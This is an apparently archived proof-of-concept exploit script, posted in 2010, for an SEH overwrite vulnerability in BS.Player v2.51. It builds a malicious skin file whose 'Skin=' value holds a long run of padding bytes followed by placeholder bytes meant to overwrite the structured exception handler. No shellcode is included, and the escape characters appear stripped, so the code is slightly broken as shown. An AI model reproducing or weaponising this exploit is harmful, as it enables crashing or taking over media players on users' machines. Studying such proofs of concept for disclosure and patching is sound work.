bsplayer_seh_overwrite.py.txt
Posted on 15 January 2010
# BS.Player v2.51 # SEH Overwrite Vulnerability # http://www.mertsarica.com junk = "[Options] Skin=" vulnerability = junk + "x41"*496 + "x42"*4 + "x43"*4 try: vulnerable = open("vulnerable.bsi",'w') vulnerable.write(vulnerability) vulnerable.close() print "Vulnerable file created! " except: print "Error occured!"